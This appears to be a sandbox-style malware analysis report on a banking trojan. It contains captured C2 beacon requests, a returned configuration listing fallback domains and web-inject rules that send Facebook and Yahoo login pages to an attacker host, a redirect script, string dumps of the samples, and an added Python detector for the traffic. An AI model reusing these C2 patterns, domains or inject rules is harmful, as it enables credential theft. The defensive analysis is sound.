HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:32 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
304...sS........groupcook.net................n.i`.....#.........}K `.l$aC".x...Q@W?6.]...~.;"..w7..P..4.5K|...$.xB.B..N;S.....B.A3..7%*.....1h>.T0.n...H..~.i\.*.OC..9...Mqp.u..w?.Qn....>.......F..,..oDi.8P..H.....,.W.l....9R.\.]a_.W..... ..r.>.......W!.i........C.P..$^".p.... .MR.....$....TU..1-....n:.e.......HI....In...Mb.....Rm.N|lH.-(...I.18.........>.).Hx....!.xd^.}..q.o...uio8.CW&}........cb......~.z6....k,.&f.....(....pr........u...,...N=.Vv.F.......}.%.i.....R..kr.l..N.y/.9.G..,.[...c.c....4....Vp4...X...).{X...@.l....W.....F#`.1....>'....W.Q.|.........P.L......P.5.b. Dj/..Y,.]......k.|.F..-....{jC.)l..C.?....C...B.'..l..\I..B\y..,y...0]..iT..-#.....w?.."4YF.5M=i.DD....=.j8......C...1jQ.,!...;...RR.2..3...x.............tu..u..MW....01.*.LD.D.~............;..i...ks.N.I....vf..m..8Dk'u..G...R.....Z..>..0..wMj._u.Hv.f.(..F.LW../x.GB...1.....{....{.._.U...;6LX&.Gu...........:)....W~1./..~.....Q... .s..bs..-%.&...$.].......w.?.D...B./..|c.2w..3......m..u&5......X.f...$...k.-Y..l.g:a....<....Zm.9....I ..$.C.'....Z....y.X.fg..k#`...W...T.......|j...r..X..Z......t.}...J.R1.$_.s.H.s.....S .U9$.k......G......4.\......7.:.\e..*$.;....Mb.8.......^..N. ....}X.T..f.,.....UMAs...T..@T..K....".Y.........a)\.........ow........
GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:11 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
ping.5.FLAG cfg.318."tablefruit.net" "frontride.net" "thistomorrow.net" "gentlefriend.net" "saltsecond.net" "wifeknew.net" "signarmy.net" "uponloud.net" "whichsing.net" "spokethere.net" "necessarydress.net" "mightglossary.net" "wrongthrew.net" "wifeyesterday.net" "southblood.net" "rememberpaint.net" "littleappear.net" "lasopeidres.com" var_user_ip.384.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";..............
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: stickmarch.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:30 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2593
Keep-Alive: timeout=5, max=126
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://stickmarch.net/?fp=RpovpAuC9ow5NmSXYSbYsAXW1b73tgquI4E1/CwV/Wj6ETs9V0ofVKvKbqDKjJD3SK789uoMvj1F7no0hWD7Kg==&prvtof=I3dbGXzv5zNA35ev750NKcXNaDpkuIgs1pDEwcENjEc=&poru=CXYqjTCPXoqD25L1oVyRCcXS69zxD9DQVU8Lo/+hqZ2ak/mOtqkXrPaUCVs3/SIsEWiWZvYinWTYyaum7A1EoqVJEpy2wKADX0luiv1zlZ39qs+KKM+2wZN8/UmQweNp&cifr=1&method=validate&mode=sox&v=029&sox=3c801802";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://stickmarch.net/?fp=RpovpAuC9ow5NmSXYSbYsAXW1b73tgquI4E1/CwV/Wj6ETs9V0ofVKvKbqDKjJD3SK789uoMvj1F7no0hWD7Kg==&prvtof=iIrQ4D05RxmqJCCqMbYJyWfc0J2NhXH1fj4rhcgAytM=&poru=0UT14yB9hwcBlx7MVz01pmfo6xBSj243Qt4wm1dq4bawCEoGNAQwgbgCPVfIcGbU02sDo6trGumf+hovPOidEGPSbsMOv4RcY7tJgdAAZJK+Y+ZvwfWH1bww
<<
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: laloponea.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:29:43 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
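The requests above all follow one pattern: a GET to index.php or forum/search.php carrying method=validate, checkport or all, mode=sox and an eight-hex-digit sox identifier, and the reply to method=all is a plaintext configuration holding a fallback hostlist, %name% = "value" fields and web-inject rules. The Python below is an added example written for this page, not code from the report or from the sample. It recognises those beacons in (host, request line) pairs and parses the configuration. The three beacon request lines and the configuration excerpt are copied from the capture above (the report's defanging, hXXp for http and VVV for www, is kept as-is); the two benign request lines are constructed, the two configuration fields whose names the report shows garbled are left out of the excerpt, and the field names given to the five-string intercept groups are this example's reading of the data, not names the malware uses.

```python
"""Added example for this report page (not code from the report or the sample):
recognise the banker's HTTP beacons seen in the capture and parse the plaintext
configuration the groupcook.net server returned to method=all."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

REQUEST_LINE_RE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")
SOX_ID_RE = re.compile(r"^[0-9a-f]{8}$")          # sox=3c801802 in every beacon
BEACON_METHODS = {"validate", "checkport", "all"}  # the three verbs in the capture


def parse_beacon(request_line: str, host: str) -> Optional[Dict[str, str]]:
    """Return the beacon's fields, or None if the request does not fit the pattern
    (a request with mode=sox, an 8-hex-digit sox id and one of the known methods)."""
    m = REQUEST_LINE_RE.match(request_line)
    if not m:
        return None
    url = urlsplit(m.group(2))
    q = parse_qs(url.query, keep_blank_values=True)  # keeps the bare "flag" token
    if q.get("mode") != ["sox"]:
        return None
    sox, method = q.get("sox", [""])[0], q.get("method", [""])[0]
    if not SOX_ID_RE.match(sox) or method not in BEACON_METHODS:
        return None
    return {"host": host, "path": url.path, "method": method,
            "version": q.get("v", [""])[0],   # "023" / "029" in the capture
            "sox": sox,
            "x64": q.get("x64", [""])[0],     # only sent on checkport / all
            "admin": q.get("adm", [""])[0]}


def scan_log(entries: List[Tuple[str, str]]) -> List[Dict[str, str]]:
    """Apply parse_beacon to (host, request_line) pairs and keep the hits."""
    hits = []
    for host, line in entries:
        rec = parse_beacon(line, host)
        if rec:
            hits.append(rec)
    return hits


class Intercept(NamedTuple):
    # Field names are this example's reading of each 5-string group (an assumption).
    target: str        # hooked site; "VVV." is the report's defanging of "www."
    inject_host: str   # server the inject content is pulled from
    inject_path: str
    trigger_path: str  # path on the target that fires the inject
    flag: str


QUOTED_RE = re.compile(r'"([^"]*)"')
FIELD_RE = re.compile(r'%(\w+)%\s*=\s*"([^"]*)"\s*;')                    # %name% = "value";
INTERCEPTS_RE = re.compile(r'%set_intercepts%\s*=\s*"(.*?)"\s*;', re.S)  # value nests quotes
HOSTLIST_RE = re.compile(r"cfg\b(.*?)var_user_ip", re.S)


def parse_config(body: str) -> Dict[str, object]:
    """Split the reply into the C2 hostlist, %name% fields and intercept rules.
    Tokenising on quoted strings keeps the parser independent of the separator
    bytes, which the report renders as dots."""
    hosts = HOSTLIST_RE.search(body)
    domains = QUOTED_RE.findall(hosts.group(1)) if hosts else []
    fields = {k: v.strip() for k, v in FIELD_RE.findall(body)}
    intercepts: List[Intercept] = []
    blob = INTERCEPTS_RE.search(body)
    if blob:
        items = QUOTED_RE.findall(blob.group(1))
        for i in range(0, len(items) - len(items) % 5, 5):  # rules come in fives
            intercepts.append(Intercept(*items[i:i + 5]))
    return {"domains": domains, "fields": fields, "intercepts": intercepts}


# Constructed log: the first three request lines are copied from the capture,
# the last two are benign look-alikes made up for this example.
SAMPLE_REQUESTS = [
    ("fredesecas.com", "GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0"),
    ("groupcook.net", "GET /forum/search.php?method=checkport&port=28929&mode=sox&v=023"
                      "&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0"),
    ("groupcook.net", "GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802"
                      "&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0"),
    ("example.org", "GET /index.php?method=validate&v=029 HTTP/1.1"),               # no mode=sox
    ("example.org", "GET /forum/search.php?mode=sox&sox=abc&method=all HTTP/1.1"),  # bad sox id
]

# Reply body to method=all as shown in the capture; the two fields whose names
# the report garbles are left out of this excerpt.
SAMPLE_CONFIG = '''ping.5.FLAG cfg.318."tablefruit.net" "frontride.net" "thistomorrow.net" "gentlefriend.net" "saltsecond.net" "wifeknew.net" "signarmy.net" "uponloud.net" "whichsing.net" "spokethere.net" "necessarydress.net" "mightglossary.net" "wrongthrew.net" "wifeyesterday.net" "southblood.net" "rememberpaint.net" "littleappear.net" "lasopeidres.com" var_user_ip.384.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";'''

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_REQUESTS):
        print("beacon", hit["host"], hit["method"], "v" + hit["version"])
    cfg = parse_config(SAMPLE_CONFIG)
    print(len(cfg["domains"]), "fallback hosts; poll every", cfg["fields"]["timer"], "s")
    for rule in cfg["intercepts"]:
        print("inject", rule.target + rule.trigger_path, "<-", rule.inject_host + rule.inject_path)
```

The beacon check deliberately keys on the query grammar (mode=sox plus the fixed-width sox id plus a known method) rather than on the hostnames, since the configuration shows eighteen further fallback domains the sample can rotate to; the hostnames are still worth blocking, but the request shape is what survives a domain change.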
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
smp5hldgdxzo4u.exe_2804:
.text
`.rdata
@.data
QSSSSSSh
j.PVf
}<%uy
~NSSSh
\$xSSShp
SSSh`vD
u#SSSh uC
tgSSSh
SSSh0
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
rtfrebrgje.exe
zo4u.exe
Services Portable Audio Compatibility Class
ionica_chirac@yahoo.com
dklhlsph.exe
mIB.Ts
.gHw?
aB.Bcr
.Py0?
es`%sDh
' RB%S>
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\smp5hldgdxzo4u.exe
mscoree.dll
KERNEL32.DLL
rtfrebrgje.exe_1104:
.text
`.rdata
@.data
QSSSSSSh
SQSSSh
-yr%XWf
SSSh0
SSSh@
u#SSSh@
t>SSSh`
t!SSSh
FSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
See how the surly Warwick mans the wall!
O unbid spite! is sportful Edward come?
I am so sorry for my trespass made
O passing traitor, perjured and unjust!
rtfrebrgje.exe
zr.exe
Services Portable Audio Compatibility Class
dklhlsph.exe
Then put up your pipes in your bag, for I'll away:
[Exeunt]
an into their estimation and report: but he hath so
ingrateful injury; to report otherwise, were a
good compass: and now I live out of all order, out
of all compass.
Look on his letter, madam; here's my passport.
Like lies disdain'd in the reporting.
Report thy parentage. I think thou said'st
c.umd.edu>, and submitted to the SHAKSPER Global
Electronic Conference <SHAKSPER> in October 1991.</SHAKSPER>
TO.THE.ONLIE.BEGETTER.OF.
THESE.INSVING.SONNETS.
Mr.W.H.ALL.HAPPINESSE.
AND.THAT.ETERNITIE.
OVR.EVER-LIVING.POET.
THE.WELL-WISHING.
ADVENTVRER.IN.
}.Gz|?q!
\.BTz
Certain ones then.
Shalt have thy trespass cited up in rhymes,
That sought to be encompass'd with your crown:
Nor thou within the compass of my curse.
Nor no one here; for curses never pass
Nay, that's certain; we have the exhibition to examine.
led to execution]
They shall have none, I swear, but these my joints;
@Ÿy
.sKN$w
This beauteous lady Thisby is certain.
[Exeunt Prologue, Thisbe, Lion, and Moonshine]
i[2.LXt
.yDp\
her as long as there is a passage in my throat and
before the priest; and certainly a woman's thought
than a monkey: I will weep for nothing, like Diana
Did point you to buy them, along as you pass'd:
And since I have not much importuned you;
Who having, by their own importunate suit,
to conceive, nor his heart to report, what my dream
transported.
if our sport had gone forward, we had all been made
To ask of whence you are. Report it.
[Knocking within. Enter a Porter]
Porter
man were porter of hell-gate, he should have
old turning the key.
Yzd of great import indeed, too, but let
that pass: for I must tell thee, it will please his
heart, let that pass. By the world, I recount no
fable: some certain special honours it pleaseth his
travel, that hath seen the world; but let that pass.
For princes to come view fair Portia:
As o'er a brook, to see fair Portia.
Lies all within. Deliver me the key:
PORTIA
Portia, adieu. I have :
Do so conjointly meet, let not men s
[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]
And I a heavy interim shall support
He cannot temperately transport his honours
In execution.
Whose father then, as men report
The time is out of joint: O cursed spite,
By this encompassment and drift of question
that our armies join not in a hot day; for, by the
.rgGD
and QUINTUS, bound, passing on to the place of
istook your passion;
Here, all enraged, such passion her assails,
To have proved most royally: and, for his passage,
[A dead march. Exeunt, bearing off the dead
I speak from certainties. Nay, more,
To hurl upon their heads that break his law.
And that same vengeance doth he hurl on thee,
Of dear import, and the neglecting it
it agrees well, passant; it is a familiar beast to
But your request shall make me let it pass.
Is this certain?
purse; I could have filed keys off that hung in
By God's fair ordinance conjoin together!
Bury it certain fathoms in the earth,
before the report come. If there be breadth enou
With willing sport to the wild ocean.
[Exeunt HUBERT with PETER]
The abuse of greatness is, when it disjoins
[Exeunt Pyramus and Thisbe]
themselves, they may pass for excellent men. Here
Then know that I, one Snug the joiner, am
[Exeunt all but BENEDICK and BEATRICE]
My master is of churlish disposition
Go with me: if you like upon report
of; which imports to the kingdom so much
Over her passion; who, most rebel-like,
But if you fondly pass our proffer'd offer,
I wish ye sport.
Experience, O, thou disprovest report!
Making lascivious comments on thy sport,
Naming thy name blesses an ill report.
Some say thy grace is youth and gentle sport;
I fear'd thy fortune, and my joints did tremble.
And from the organ-pipe of frailty sings
It would not out at windows nor at doors.
[Flourish. Exeunt]
And good supporters are you.
Each one with ireful passion, with drawn swords,
Sport and repose lock from me day and night!
So 'tis reported:
Hortensio's passion;
[Exeunt BIANCA and Servant]
Shall find him by his large and portly size.
And the very ports they blow,
My true love's passion: therefore pardon me,
say, you cannot pass. Therefore, go back.
[Exeunt CORIOLANUS and AUFIDIUS. The two
false report of him.
come to pass, say Pompey told you so.
Yet are they passing cowardly. But, I beseech you,
[Exeunt FALSTAFF and Justices]
Be avised, sir, and pass good humours: I will say
so conclusions passed the careires.
And, kinsmen, then we may go pipe for justice.
Join with the Goths; and with revengeful war
Sport royal, I warrant you: I know my physic will
but from proof as strong as my grief and as certain
her life: I shall give thee opportunity at
where, if thou fear to strike and to make me certain
in several disports. Whereupon the nobqUY
[Exeunt Citizens]
'His browny locks did hang in crooked curls;
Upon his lips their silken parcels hurls.
zcÁ
%System%\dklhlsph.exe
|groupcook.net
WATCHDOGPROC "c:\windows\system32\rtfrebrgje.exe"
%System%\rtfrebrgje.exe
mscoree.dll
KERNEL32.DLL
ihj3deeem5zr.exe_704:
.text
`.rdata
@.data
QSSSSSSh
SQSSSh
-yr%XWf
SSSh0
SSSh@
u#SSSh@
t>SSSh`
t!SSSh
FSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
See how the surly Warwick mans the wall!
O unbid spite! is sportful Edward come?
I am so sorry for my trespass made
O passing traitor, perjured and unjust!
rtfrebrgje.exe
zr.exe
Services Portable Audio Compatibility Class
dklhlsph.exe
Then put up your pipes in your bag, for I'll away:
[Exeunt]
an into their estimation and report: but he hath so
ingrateful injury; to report otherwise, were a
good compass: and now I live out of all order, out
of all compass.
Look on his letter, madam; here's my passport.
Like lies disdain'd in the reporting.
Report thy parentage. I think thou said'st
c.umd.edu>, and submitted to the SHAKSPER Global
Electronic Conference <SHAKSPER> in October 1991.</SHAKSPER>
TO.THE.ONLIE.BEGETTER.OF.
THESE.INSVING.SONNETS.
Mr.W.H.ALL.HAPPINESSE.
AND.THAT.ETERNITIE.
OVR.EVER-LIVING.POET.
THE.WELL-WISHING.
ADVENTVRER.IN.
}.Gz|?q!
\.BTz
Certain ones then.
Shalt have thy trespass cited up in rhymes,
That sought to be encompass'd with your crown:
Nor thou within the compass of my curse.
Nor no one here; for curses never pass
Nay, that's certain; we have the exhibition to examine.
led to execution]
They shall have none, I swear, but these my joints;
@Ÿy
.sKN$w
This beauteous lady Thisby is certain.
[Exeunt Prologue, Thisbe, Lion, and Moonshine]
i[2.LXt
.yDp\
her as long as there is a passage in my throat and
before the priest; and certainly a woman's thought
than a monkey: I will weep for nothing, like Diana
Did point you to buy them, along as you pass'd:
And since I have not much importuned you;
Who having, by their own importunate suit,
to conceive, nor his heart to report, what my dream
transported.
if our sport had gone forward, we had all been made
To ask of whence you are. Report it.
[Knocking within. Enter a Porter]
Porter
man were porter of hell-gate, he should have
old turning the key.
Yzd of great import indeed, too, but let
that pass: for I must tell thee, it will please his
heart, let that pass. By the world, I recount no
fable: some certain special honours it pleaseth his
travel, that hath seen the world; but let that pass.
For princes to come view fair Portia:
As o'er a brook, to see fair Portia.
Lies all within. Deliver me the key:
PORTIA
Portia, adieu. I have :
Do so conjointly meet, let not men s
[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]
And I a heavy interim shall support
He cannot temperately transport his honours
In execution.
Whose father then, as men report
The time is out of joint: O cursed spite,
By this encompassment and drift of question
that our armies join not in a hot day; for, by the
.rgGD
and QUINTUS, bound, passing on to the place of
istook your passion;
Here, all enraged, such passion her assails,
To have proved most royally: and, for his passage,
[A dead march. Exeunt, bearing off the dead
I speak from certainties. Nay, more,
To hurl upon their heads that break his law.
And that same vengeance doth he hurl on thee,
Of dear import, and the neglecting it
it agrees well, passant; it is a familiar beast to
But your request shall make me let it pass.
Is this certain?
purse; I could have filed keys off that hung in
By God's fair ordinance conjoin together!
Bury it certain fathoms in the earth,
before the report come. If there be breadth enou
With willing sport to the wild ocean.
[Exeunt HUBERT with PETER]
The abuse of greatness is, when it disjoins
[Exeunt Pyramus and Thisbe]
themselves, they may pass for excellent men. Here
Then know that I, one Snug the joiner, am
[Exeunt all but BENEDICK and BEATRICE]
My master is of churlish disposition
Go with me: if you like upon report
hÂ